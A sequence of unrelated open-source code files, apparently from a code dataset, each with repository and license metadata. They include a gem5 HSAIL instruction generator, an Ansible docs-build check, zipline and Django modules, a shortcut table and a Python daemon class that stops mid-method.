Wavefront *w = gpuDynInst->wavefront();
typedef typename Base::Src0CType Src0T;
typedef typename Base::Src1CType Src1T;
typedef typename Base::Src2CType Src2T;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
Src0T src_val0 = this->src0.template get<Src0T>(w, lane);
Src1T src_val1 = this->src1.template get<Src1T>(w, lane);
Src2T src_val2 = this->src2.template get<Src2T>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_1dt_2src_1dest = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
typedef typename Base::DestCType DestT;
typedef CType Src0T;
typedef typename Base::Src1CType Src1T;
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestT dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<DestT>(w, lane);
}
Src0T src_val0 = this->src0.template get<Src0T>(w, lane);
Src1T src_val1 = this->src1.template get<Src1T>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_shift = '''
template<typename DataType>
void
$class_name<DataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
if ($dest_is_src_flag) {
dest_val = this->dest.template get<CType>(w, lane);
}
CType src_val0 = this->src0.template get<CType>(w, lane);
uint32_t src_val1 = this->src1.template get<uint32_t>(w, lane);
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_template_2dt = '''
template<typename DestDataType, class SrcDataType>
void
$class_name<DestDataType, SrcDataType>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
DestCType dest_val;
SrcCType src_val[$num_srcs];
for (int i = 0; i < $num_srcs; ++i) {
src_val[i] = this->src[i].template get<SrcCType>(w, lane);
}
dest_val = $expr;
this->dest.set(w, lane, dest_val);
}
}
}
'''
exec_templates = {
'ArithInst': exec_template_1dt_varsrcs,
'CmovInst': exec_template_1dt_3srcs,
'ExtractInsertInst': exec_template_1dt_3srcs,
'ClassInst': exec_template_1dt_2src_1dest,
'CmpInst': exec_template_2dt,
'CvtInst': exec_template_2dt,
'PopcountInst': exec_template_2dt,
'LdInst': '',
'StInst': '',
'SpecialInstNoSrc': exec_template_nodt_nosrc,
'SpecialInst1Src': exec_template_nodt_1src,
'SpecialInstNoSrcNoDest': '',
'Stub': exec_template_stub,
}
###############
#
# Define code templates for the decoder cases
#
###############
# decode template for nodt-opcode case
decode_nodt_template = '''
case BRIG_OPCODE_$brig_opcode_upper: return $constructor(ib, obj);'''
decode_case_prolog_class_inst = '''
case BRIG_OPCODE_$brig_opcode_upper:
{
//const BrigOperandBase *baseOp = obj->getOperand(ib->operands[1]);
BrigType16_t type = ((BrigInstSourceType*)ib)->sourceType;
//switch (baseOp->kind) {
// case BRIG_OPERAND_REG:
// type = ((const BrigOperandReg*)baseOp)->type;
// break;
// case BRIG_OPERAND_IMMED:
// type = ((const BrigOperandImmed*)baseOp)->type;
// break;
// default:
// fatal("CLASS unrecognized kind of operand %d\\n",
// baseOp->kind);
//}
switch (type) {'''
# common prolog for 1dt- or 2dt-opcode case: switch on data type
decode_case_prolog = '''
case BRIG_OPCODE_$brig_opcode_upper:
{
switch (ib->type) {'''
# single-level decode case entry (for 1dt opcodes)
decode_case_entry = \
' case BRIG_TYPE_$type_name: return $constructor(ib, obj);'
decode_store_prolog = \
' case BRIG_TYPE_$type_name: {'
decode_store_case_epilog = '''
}'''
decode_store_case_entry = \
' return $constructor(ib, obj);'
# common epilog for type switch
decode_case_epilog = '''
default: fatal("$brig_opcode_upper: unrecognized type %d\\n",
ib->type);
}
}
break;'''
# Additional templates for nested decode on a second type field (for
# compare and convert). These are used in place of the
# decode_case_entry template to create a second-level switch on the
# second type field inside each case of the first-level type switch.
# Because the name and location of the second type can vary, the Brig
# instruction type must be provided in $brig_type, and the name of the
# second type field must be provided in $type_field.
decode_case2_prolog = '''
case BRIG_TYPE_$type_name:
switch (((Brig$brig_type*)ib)->$type2_field) {'''
decode_case2_entry = \
' case BRIG_TYPE_$type2_name: return $constructor(ib, obj);'
decode_case2_epilog = '''
default: fatal("$brig_opcode_upper: unrecognized $type2_field %d\\n",
((Brig$brig_type*)ib)->$type2_field);
}
break;'''
# Figure out how many source operands an expr needs by looking for the
# highest-numbered srcN value referenced. Since sources are numbered
# starting at 0, the return value is N+1.
def num_src_operands(expr):
if expr.find('src2') != -1:
return 3
elif expr.find('src1') != -1:
return 2
elif expr.find('src0') != -1:
return 1
else:
return 0
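# Illustrative examples of the rule above (not part of the original script):
#
#     num_src_operands('src0 + src1')         # -> 2
#     num_src_operands('src0 * src1 + src2')  # -> 3
#     num_src_operands('w->wfId')             # -> 0 (no srcN referenced)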
###############
#
# Define final code generation methods
#
# The gen() function below (and the gen_special() wrapper further down)
# is the interface for generating actual instructions.
#
###############
# Generate class declaration, exec function, and decode switch case
# for a brig_opcode with a single-level type switch. The 'types'
# parameter is a list or tuple of types for which the instruction
# should be instantiated.
def gen(brig_opcode, types=None, expr=None, base_class='ArithInst',
type2_info=None, constructor_prefix='new ', is_store=False):
brig_opcode_upper = brig_opcode.upper()
class_name = brig_opcode
opcode = class_name.lower()
if base_class == 'ArithInst':
# note that expr must be provided with ArithInst so we can
# derive num_srcs for the template
assert expr
if expr:
# Derive several bits of info from expr. If expr is not used,
# this info will be irrelevant.
num_srcs = num_src_operands(expr)
# if the RHS expression includes 'dest', then we're doing an RMW
# on the reg and we need to treat it like a source
dest_is_src = expr.find('dest') != -1
dest_is_src_flag = str(dest_is_src).lower() # for C++
if base_class in ['ShiftInst']:
expr = re.sub(r'\bsrc(\d)\b', r'src_val\1', expr)
elif base_class in ['ArithInst', 'CmpInst', 'CvtInst', 'PopcountInst']:
expr = re.sub(r'\bsrc(\d)\b', r'src_val[\1]', expr)
else:
expr = re.sub(r'\bsrc(\d)\b', r'src_val\1', expr)
expr = re.sub(r'\bdest\b', r'dest_val', expr)
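# Example of the rewrite above (illustrative): for an ArithInst such as Add,
# 'src0 + src1' becomes 'src_val[0] + src_val[1]', matching the src_val array
# in exec_template_1dt_varsrcs; for a ShiftInst, 'src0 << (unsigned)src1'
# becomes 'src_val0 << (unsigned)src_val1', matching the scalar locals.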
# Strip template arguments off of base class before looking up
# appropriate templates
base_class_base = re.sub(r'<.*>$', '', base_class)
header_code(header_templates[base_class_base])
if base_class.startswith('SpecialInst') or base_class.startswith('Stub'):
exec_code(exec_templates[base_class_base])
elif base_class.startswith('ShiftInst'):
header_code(exec_template_shift)
else:
header_code(exec_templates[base_class_base])
if not types or isinstance(types, str):
# Just a single type
constructor = constructor_prefix + class_name
decoder_code(decode_nodt_template)
else:
# multiple types, need at least one level of decode
if brig_opcode == 'Class':
decoder_code(decode_case_prolog_class_inst)
else:
decoder_code(decode_case_prolog)
if not type2_info:
if not is_store:
# single list of types: basic one-level decode
for type_name in types:
full_class_name = '%s<%s>' % (class_name, type_name.upper())
constructor = constructor_prefix + full_class_name
decoder_code(decode_case_entry)
else:
# single list of types: one-level decode using the store templates
for type_name in types:
decoder_code(decode_store_prolog)
type_size = int(re.findall(r'[0-9]+', type_name)[0])
src_size = 32
type_type = type_name[0]
full_class_name = '%s<%s,%s>' % (class_name, \
type_name.upper(), \
'%s%d' % \
(type_type.upper(), \
type_size))
constructor = constructor_prefix + full_class_name
decoder_code(decode_store_case_entry)
decoder_code(decode_store_case_epilog)
else:
# need secondary type switch (convert, compare)
# unpack extra info on second switch
(type2_field, types2) = type2_info
brig_type = 'Inst%s' % brig_opcode
for type_name in types:
decoder_code(decode_case2_prolog)
fmt = '%s<%s,%%s>' % (class_name, type_name.upper())
for type2_name in types2:
full_class_name = fmt % type2_name.upper()
constructor = constructor_prefix + full_class_name
decoder_code(decode_case2_entry)
decoder_code(decode_case2_epilog)
decoder_code(decode_case_epilog)
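# Worked example (illustrative): gen('Add', arith_types, 'src0 + src1') emits
# an Add<DataType> declaration from header_template_1dt_varsrcs, an execute()
# body from exec_template_1dt_varsrcs with $expr rewritten to
# 'src_val[0] + src_val[1]', and one 'case BRIG_TYPE_*' decoder entry per
# type in arith_types under 'case BRIG_OPCODE_ADD'.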
###############
#
# Generate instructions
#
###############
# handy abbreviations for common sets of types
# arithmetic ops are typically defined only on 32- and 64-bit sizes
arith_int_types = ('S32', 'U32', 'S64', 'U64')
arith_float_types = ('F32', 'F64')
arith_types = arith_int_types + arith_float_types
bit_types = ('B1', 'B32', 'B64')
all_int_types = ('S8', 'U8', 'S16', 'U16') + arith_int_types
# I think you might be able to do 'f16' memory ops too, but we'll
# ignore them for now.
mem_types = all_int_types + arith_float_types
mem_atom_types = all_int_types + ('B32', 'B64')
##### Arithmetic & logical operations
gen('Add', arith_types, 'src0 + src1')
gen('Sub', arith_types, 'src0 - src1')
gen('Mul', arith_types, 'src0 * src1')
gen('Div', arith_types, 'src0 / src1')
gen('Min', arith_types, 'std::min(src0, src1)')
gen('Max', arith_types, 'std::max(src0, src1)')
gen('Gcnmin', arith_types, 'std::min(src0, src1)')
gen('CopySign', arith_float_types,
'src1 < 0 ? -std::abs(src0) : std::abs(src0)')
gen('Sqrt', arith_float_types, 'sqrt(src0)')
gen('Floor', arith_float_types, 'floor(src0)')
# "fast" sqrt... same as slow for us
gen('Nsqrt', arith_float_types, 'sqrt(src0)')
gen('Nrsqrt', arith_float_types, '1.0/sqrt(src0)')
gen('Nrcp', arith_float_types, '1.0/src0')
gen('Fract', arith_float_types,
'(src0 >= 0.0)?(src0-floor(src0)):(floor(src0)-src0)')
gen('Ncos', arith_float_types, 'cos(src0)')
gen('Nsin', arith_float_types, 'sin(src0)')
gen('And', bit_types, 'src0 & src1')
gen('Or', bit_types, 'src0 | src1')
gen('Xor', bit_types, 'src0 ^ src1')
gen('Bitselect', bit_types, '(src1 & src0) | (src2 & ~src0)')
gen('Popcount', ('U32',), '__builtin_popcount(src0)', 'PopcountInst', \
('sourceType', ('B32', 'B64')))
gen('Shl', arith_int_types, 'src0 << (unsigned)src1', 'ShiftInst')
gen('Shr', arith_int_types, 'src0 >> (unsigned)src1', 'ShiftInst')
# gen('Mul_hi', types=('s32','u32', '??'))
# gen('Mul24', types=('s32','u32', '??'))
gen('Rem', arith_int_types, 'src0 - ((src0 / src1) * src1)')
gen('Abs', arith_types, 'std::abs(src0)')
gen('Neg', arith_types, '-src0')
gen('Mov', bit_types + arith_types, 'src0')
gen('Not', bit_types, 'heynot(src0)')
# mad and fma differ only in rounding behavior, which we don't emulate
# also there's an integer form of mad, but not of fma
gen('Mad', arith_types, 'src0 * src1 + src2')
gen('Fma', arith_float_types, 'src0 * src1 + src2')
# native floating point operations
gen('Nfma', arith_float_types, 'src0 * src1 + src2')
gen('Cmov', bit_types, 'src0 ? src1 : src2', 'CmovInst')
gen('BitAlign', bit_types, '(src0 << src2)|(src1 >> (32 - src2))')
gen('ByteAlign', bit_types, '(src0 << 8 * src2)|(src1 >> (32 - 8 * src2))')
# see base/bitfield.hh
gen('BitExtract', arith_int_types, 'bits(src0, src1, src1 + src2 - 1)',
'ExtractInsertInst')
gen('BitInsert', arith_int_types, 'insertBits(dest, src1, src2, src0)',
'ExtractInsertInst')
##### Compare
gen('Cmp', ('B1', 'S32', 'U32', 'F32'), 'compare(src0, src1, this->cmpOp)',
'CmpInst', ('sourceType', arith_types + bit_types))
gen('Class', arith_float_types, 'fpclassify(src0,src1)','ClassInst')
##### Conversion
# Conversion operations are only defined on B1, not B32 or B64
cvt_types = ('B1',) + mem_types
gen('Cvt', cvt_types, 'src0', 'CvtInst', ('sourceType', cvt_types))
##### Load & Store
gen('Lda', mem_types, base_class = 'LdInst', constructor_prefix='decode')
gen('Ld', mem_types, base_class = 'LdInst', constructor_prefix='decode')
gen('St', mem_types, base_class = 'StInst', constructor_prefix='decode',
is_store=True)
gen('Atomic', mem_atom_types, base_class='StInst', constructor_prefix='decode')
gen('AtomicNoRet', mem_atom_types, base_class='StInst',
constructor_prefix='decode')
gen('Cbr', base_class = 'LdInst', constructor_prefix='decode')
gen('Br', base_class = 'LdInst', constructor_prefix='decode')
##### Special operations
def gen_special(brig_opcode, expr, dest_type='U32'):
num_srcs = num_src_operands(expr)
if num_srcs == 0:
base_class = 'SpecialInstNoSrc<%s>' % dest_type
elif num_srcs == 1:
base_class = 'SpecialInst1Src<%s>' % dest_type
else:
assert False, "gen_special only supports 0 or 1 source operands"
gen(brig_opcode, None, expr, base_class)
gen_special('WorkItemId', 'w->workItemId[src0][lane]')
gen_special('WorkItemAbsId',
'w->workItemId[src0][lane] + (w->workGroupId[src0] * w->workGroupSz[src0])')
gen_special('WorkGroupId', 'w->workGroupId[src0]')
gen_special('WorkGroupSize', 'w->workGroupSz[src0]')
gen_special('CurrentWorkGroupSize', 'w->workGroupSz[src0]')
gen_special('GridSize', 'w->gridSz[src0]')
gen_special('GridGroups',
'divCeil(w->gridSz[src0],w->workGroupSz[src0])')
gen_special('LaneId', 'lane')
gen_special('WaveId', 'w->wfId')
gen_special('Clock', 'w->computeUnit->shader->tick_cnt', 'U64')
# gen_special('CU'', ')
gen('Ret', base_class='SpecialInstNoSrcNoDest')
gen('Barrier', base_class='SpecialInstNoSrcNoDest')
gen('MemFence', base_class='SpecialInstNoSrcNoDest')
# Map magic instructions to the BrigSyscall opcode
# Magic instructions are defined in magic.hh
#
# In the future, real HSA kernel system calls can be implemented and coexist
# with magic instructions.
gen('Call', base_class='SpecialInstNoSrcNoDest')
# Stubs for unimplemented instructions:
# These may need to be implemented at some point in the future, but
# for now we just match the instructions with their operands.
#
# By defining stubs for these instructions, we can work with
# applications that have them in dead/unused code paths.
#
# Needed for rocm-hcc compilations for HSA backends since
# builtins-hsail library is `cat`d onto the generated kernels.
# The builtins-hsail library consists of handcoded hsail functions
# that __might__ be needed by the rocm-hcc compiler in certain binaries.
gen('Bitmask', base_class='Stub')
gen('Bitrev', base_class='Stub')
gen('Firstbit', base_class='Stub')
gen('Lastbit', base_class='Stub')
gen('Unpacklo', base_class='Stub')
gen('Unpackhi', base_class='Stub')
gen('Pack', base_class='Stub')
gen('Unpack', base_class='Stub')
gen('Lerp', base_class='Stub')
gen('Packcvt', base_class='Stub')
gen('Unpackcvt', base_class='Stub')
gen('Sad', base_class='Stub')
gen('Sadhi', base_class='Stub')
gen('Activelanecount', base_class='Stub')
gen('Activelaneid', base_class='Stub')
gen('Activelanemask', base_class='Stub')
gen('Activelanepermute', base_class='Stub')
gen('Groupbaseptr', base_class='Stub')
gen('Signalnoret', base_class='Stub')
###############
#
# Generate file epilogs
#
###############
header_code('''
template<>
inline void
Abs<U32>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
CType src_val;
src_val = this->src[0].template get<CType>(w, lane);
dest_val = (CType)(src_val);
this->dest.set(w, lane, dest_val);
}
}
}
template<>
inline void
Abs<U64>::execute(GPUDynInstPtr gpuDynInst)
{
Wavefront *w = gpuDynInst->wavefront();
const VectorMask &mask = w->getPred();
for (int lane = 0; lane < w->computeUnit->wfSize(); ++lane) {
if (mask[lane]) {
CType dest_val;
CType src_val;
src_val = this->src[0].template get<CType>(w, lane);
dest_val = (CType)(src_val);
this->dest.set(w, lane, dest_val);
}
}
}
''')
header_code.dedent()
header_code('''
} // namespace HsailISA
''')
# close off main decode switch
decoder_code.dedent()
decoder_code.dedent()
decoder_code('''
default: fatal("unrecognized Brig opcode %d\\n", ib->opcode);
} // end switch(ib->opcode)
} // end decode()
} // namespace HsailISA
''')
exec_code.dedent()
exec_code('''
} // namespace HsailISA
''')
###############
#
# Output accumulated code to files
#
###############
header_code.write(sys.argv[1])
decoder_code.write(sys.argv[2])
exec_code.write(sys.argv[3])
|
bsd-3-clause
|
KohlsTechnology/ansible
|
test/sanity/code-smell/docs-build.py
|
17
|
3775
|
#!/usr/bin/env python
import os
import re
import subprocess
def main():
base_dir = os.getcwd() + os.sep
docs_dir = os.path.abspath('docs/docsite')
cmd = ['make', 'singlehtmldocs']
sphinx = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=docs_dir)
stdout, stderr = sphinx.communicate()
if sphinx.returncode != 0:
raise subprocess.CalledProcessError(sphinx.returncode, cmd, output=stdout, stderr=stderr)
with open('docs/docsite/rst_warnings', 'r') as warnings_fd:
output = warnings_fd.read().strip()
lines = output.splitlines()
known_warnings = {
'block-quote-missing-blank-line': r'^Block quote ends without a blank line; unexpected unindent.$',
'literal-block-lex-error': r'^Could not lex literal_block as "[^"]*". Highlighting skipped.$',
'duplicate-label': r'^duplicate label ',
'undefined-label': r'undefined label: ',
'unknown-document': r'unknown document: ',
'toc-tree-missing-document': r'toctree contains reference to nonexisting document ',
'reference-target-not-found': r'[^ ]* reference target not found: ',
'not-in-toc-tree': r"document isn't included in any toctree$",
'unexpected-indentation': r'^Unexpected indentation.$',
'definition-list-missing-blank-line': r'^Definition list ends without a blank line; unexpected unindent.$',
'explicit-markup-missing-blank-line': r'Explicit markup ends without a blank line; unexpected unindent.$',
'toc-tree-glob-pattern-no-match': r"^toctree glob pattern '[^']*' didn't match any documents$",
'unknown-interpreted-text-role': r'^Unknown interpreted text role "[^"]*".$',
}
ignore_codes = [
'literal-block-lex-error',
'reference-target-not-found',
'not-in-toc-tree',
]
used_ignore_codes = set()
for line in lines:
match = re.search('^(?P<path>[^:]+):((?P<line>[0-9]+):)?((?P<column>[0-9]+):)? (?P<level>WARNING|ERROR): (?P<message>.*)$', line)
if not match:
path = 'docs/docsite/rst/index.rst'
lineno = 0
column = 0
code = 'unknown'
message = line
# surface unknown lines while filtering out known lines to avoid excessive output
print('%s:%d:%d: %s: %s' % (path, lineno, column, code, message))
continue
path = match.group('path')
lineno = int(match.group('line') or 0)
column = int(match.group('column') or 0)
level = match.group('level').lower()
message = match.group('message')
path = os.path.abspath(path)
if path.startswith(base_dir):
path = path[len(base_dir):]
if path.startswith('rst/'):
path = 'docs/docsite/' + path # fix up paths reported relative to `docs/docsite/`
if level == 'warning':
code = 'warning'
for label, pattern in known_warnings.items():
if re.search(pattern, message):
code = label
break
else:
code = 'error'
if code == 'not-in-toc-tree' and path.startswith('docs/docsite/rst/modules/'):
continue # modules are not expected to be in the toc tree
if code in ignore_codes:
used_ignore_codes.add(code)
continue # ignore these codes
print('%s:%d:%d: %s: %s' % (path, lineno, column, code, message))
unused_ignore_codes = set(ignore_codes) - used_ignore_codes
for code in unused_ignore_codes:
print('test/sanity/code-smell/docs-build.py:0:0: remove `%s` from the `ignore_codes` list as it is no longer needed' % code)
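# Example (hypothetical warning line) of what the warning-line regex in main()
# extracts:
#
#     'docs/docsite/rst/foo.rst:12: WARNING: undefined label: bar'
#
# matches with path='docs/docsite/rst/foo.rst', line='12', level='WARNING',
# and message='undefined label: bar', which maps to code 'undefined-label'.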
if __name__ == '__main__':
main()
|
gpl-3.0
|
quantopian/zipline
|
zipline/data/in_memory_daily_bars.py
|
1
|
5363
|
from six import iteritems
import numpy as np
import pandas as pd
from pandas import NaT
from trading_calendars import TradingCalendar
from zipline.data.bar_reader import OHLCV, NoDataOnDate, NoDataForSid
from zipline.data.session_bars import CurrencyAwareSessionBarReader
from zipline.utils.input_validation import expect_types, validate_keys
from zipline.utils.pandas_utils import check_indexes_all_same
class InMemoryDailyBarReader(CurrencyAwareSessionBarReader):
"""
A SessionBarReader backed by a dictionary of in-memory DataFrames.
Parameters
----------
frames : dict[str -> pd.DataFrame]
Dictionary from field name ("open", "high", "low", "close", or
"volume") to DataFrame containing data for that field.
calendar : str or trading_calendars.TradingCalendar
Calendar (or name of calendar) to which data is aligned.
currency_codes : pd.Series
Map from sid -> listing currency for that sid.
verify_indices : bool, optional
Whether or not to verify that input data is correctly aligned to the
given calendar. Default is True.
"""
@expect_types(
frames=dict,
calendar=TradingCalendar,
verify_indices=bool,
currency_codes=pd.Series,
)
def __init__(self,
frames,
calendar,
currency_codes,
verify_indices=True):
self._frames = frames
self._values = {key: frame.values for key, frame in iteritems(frames)}
self._calendar = calendar
self._currency_codes = currency_codes
validate_keys(frames, set(OHLCV), type(self).__name__)
if verify_indices:
verify_frames_aligned(list(frames.values()), calendar)
self._sessions = frames['close'].index
self._sids = frames['close'].columns
@classmethod
def from_panel(cls, panel, calendar, currency_codes):
"""Helper for construction from a pandas.Panel.
"""
return cls(dict(panel.iteritems()), calendar, currency_codes)
@property
def last_available_dt(self):
return self._calendar[-1]
@property
def trading_calendar(self):
return self._calendar
@property
def sessions(self):
return self._sessions
def load_raw_arrays(self, columns, start_dt, end_dt, assets):
if start_dt not in self._sessions:
raise NoDataOnDate(start_dt)
if end_dt not in self._sessions:
raise NoDataOnDate(end_dt)
asset_indexer = self._sids.get_indexer(assets)
if -1 in asset_indexer:
bad_assets = assets[asset_indexer == -1]
raise NoDataForSid(bad_assets)
date_indexer = self._sessions.slice_indexer(start_dt, end_dt)
out = []
for c in columns:
out.append(self._values[c][date_indexer, asset_indexer])
return out
def get_value(self, sid, dt, field):
"""
Parameters
----------
sid : int
The asset identifier.
dt : datetime64-like
Midnight of the day for which data is requested.
field : string
The price field. e.g. ('open', 'high', 'low', 'close', 'volume')
Returns
-------
float
The spot price for ``field`` of the given sid on the given day.
Raises a NoDataOnDate exception if the given dt and sid are before
or after the date range of the equity.
Returns -1 if the day is within the date range, but the price is
0.
"""
return self._frames[field].loc[dt, sid]
def get_last_traded_dt(self, asset, dt):
"""
Parameters
----------
asset : zipline.asset.Asset
The asset identifier.
dt : datetime64-like
Midnight of the day for which data is requested.
Returns
-------
pd.Timestamp : The last known trade dt for the asset at or before ``dt``;
NaT if no trade is found before the given dt.
"""
try:
# only consider sessions at or before dt, per the docstring
return self._frames['close'].loc[:dt, asset.sid].last_valid_index()
except IndexError:
return NaT
@property
def first_trading_day(self):
return self._sessions[0]
def currency_codes(self, sids):
codes = self._currency_codes
return np.array([codes[sid] for sid in sids])
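# Construction sketch (hypothetical data, not from this module):
#
#     sessions = calendar.sessions_in_range(start, end)
#     frames = {field: pd.DataFrame(data[field], index=sessions, columns=sids)
#               for field in ('open', 'high', 'low', 'close', 'volume')}
#     reader = InMemoryDailyBarReader(frames, calendar, currency_codes)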
def verify_frames_aligned(frames, calendar):
"""
Verify that DataFrames in ``frames`` have the same indexing scheme and are
aligned to ``calendar``.
Parameters
----------
frames : list[pd.DataFrame]
calendar : trading_calendars.TradingCalendar
Raises
------
ValueError
If frames have different indexes/columns, or if frame indexes do not
match a contiguous region of ``calendar``.
"""
indexes = [f.index for f in frames]
check_indexes_all_same(indexes, message="DataFrame indexes don't match:")
columns = [f.columns for f in frames]
check_indexes_all_same(columns, message="DataFrame columns don't match:")
start, end = indexes[0][[0, -1]]
cal_sessions = calendar.sessions_in_range(start, end)
check_indexes_all_same(
[indexes[0], cal_sessions],
"DataFrame index doesn't match {} calendar:".format(calendar.name),
)
|
apache-2.0
|
fabioz/PyDev.Debugger
|
third_party/pep8/lib2to3/lib2to3/pygram.py
|
320
|
1118
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Export the Python grammar and symbols."""
# Python imports
import os
# Local imports
from .pgen2 import token
from .pgen2 import driver
from . import pytree
# The grammar file
_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt")
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__),
"PatternGrammar.txt")
class Symbols(object):
def __init__(self, grammar):
"""Initializer.
Creates an attribute for each grammar symbol (nonterminal),
whose value is the symbol's type (an int >= 256).
"""
for name, symbol in grammar.symbol2number.iteritems():
setattr(self, name, symbol)
python_grammar = driver.load_grammar(_GRAMMAR_FILE)
python_symbols = Symbols(python_grammar)
python_grammar_no_print_statement = python_grammar.copy()
del python_grammar_no_print_statement.keywords["print"]
pattern_grammar = driver.load_grammar(_PATTERN_GRAMMAR_FILE)
pattern_symbols = Symbols(pattern_grammar)
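# Usage sketch: grammar nonterminals become attributes whose values are the
# symbol numbers (ints >= 256), e.g.
#
#     python_symbols.file_input   # type number of the 'file_input' nonterminal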
|
epl-1.0
|
programadorjc/django
|
tests/modeladmin/models.py
|
108
|
1603
|
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Band(models.Model):
name = models.CharField(max_length=100)
bio = models.TextField()
sign_date = models.DateField()
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
class Concert(models.Model):
main_band = models.ForeignKey(Band, models.CASCADE, related_name='main_concerts')
opening_band = models.ForeignKey(Band, models.CASCADE, related_name='opening_concerts',
blank=True)
day = models.CharField(max_length=3, choices=((1, 'Fri'), (2, 'Sat')))
transport = models.CharField(max_length=100, choices=(
(1, 'Plane'),
(2, 'Train'),
(3, 'Bus')
), blank=True)
class ValidationTestModel(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField()
users = models.ManyToManyField(User)
state = models.CharField(max_length=2, choices=(("CO", "Colorado"), ("WA", "Washington")))
is_active = models.BooleanField(default=False)
pub_date = models.DateTimeField()
band = models.ForeignKey(Band, models.CASCADE)
no = models.IntegerField(verbose_name="Number", blank=True, null=True) # This field is intentionally 2 characters long. See #16080.
def decade_published_in(self):
return self.pub_date.strftime('%Y')[:3] + "0's"
class ValidationTestInlineModel(models.Model):
parent = models.ForeignKey(ValidationTestModel, models.CASCADE)
|
bsd-3-clause
|
suizokukan/dchars-fe
|
kshortcuts.py
|
1
|
2929
|
#!./python_link
# -*- coding: utf-8 -*-
################################################################################
# DChars-FE Copyright (C) 2008 Xavier Faure
# Contact: faure dot epistulam dot mihi dot scripsisti at orange dot fr
#
# This file is part of DChars-FE.
# DChars-FE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DChars-FE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DChars-FE. If not, see <http://www.gnu.org/licenses/>.
################################################################################
"""
❏DChars-FE❏ kshortcuts.py
(keyboard) shortcuts
"""
################################################################################
class KeyboardShortcut(object):
"""
class KeyboardShortcut
Use this class to store two representations of shortcuts: the Qt one
and the "human readable" one.
"""
#///////////////////////////////////////////////////////////////////////////
def __init__(self, qstring, human_readable_string):
"""
KeyboardShortcut.__init__
"""
self.qstring = qstring
self.human_readable_string = human_readable_string
KSHORTCUTS = {
"open" : \
KeyboardShortcut( qstring = "CTRL+O",
human_readable_string = "CTRL+O" ),
"save as" : \
KeyboardShortcut( qstring = "CTRL+S",
human_readable_string = "CTRL+S" ),
"exit" : \
KeyboardShortcut( qstring = "CTRL+Q",
human_readable_string = "CTRL+Q" ),
"display help chars" : \
KeyboardShortcut( qstring = "CTRL+H",
human_readable_string = "CTRL+H" ),
"apply" : \
KeyboardShortcut( qstring = "CTRL+SPACE",
human_readable_string = "CTRL+SPACE" ),
"add trans" : \
KeyboardShortcut( qstring = "CTRL++",
human_readable_string = "CTRL + '+'" ),
"sub trans" : \
KeyboardShortcut( qstring = "CTRL+-",
human_readable_string = "CTRL + '-'" ),
}
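# Usage sketch (hypothetical Qt code, not part of this module):
#
#     action.setShortcut(QtGui.QKeySequence(KSHORTCUTS["open"].qstring))
#     tooltip = "Open (%s)" % KSHORTCUTS["open"].human_readable_string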
|
gpl-3.0
|
akniffe1/fsf
|
fsf-server/daemon.py
|
1
|
3798
|
#!/usr/bin/env python
#
# All credit for this class goes to Sander Marechal, 2009-05-31
# Reference: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/
#
#
import sys, os, time, atexit
from signal import SIGTERM
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
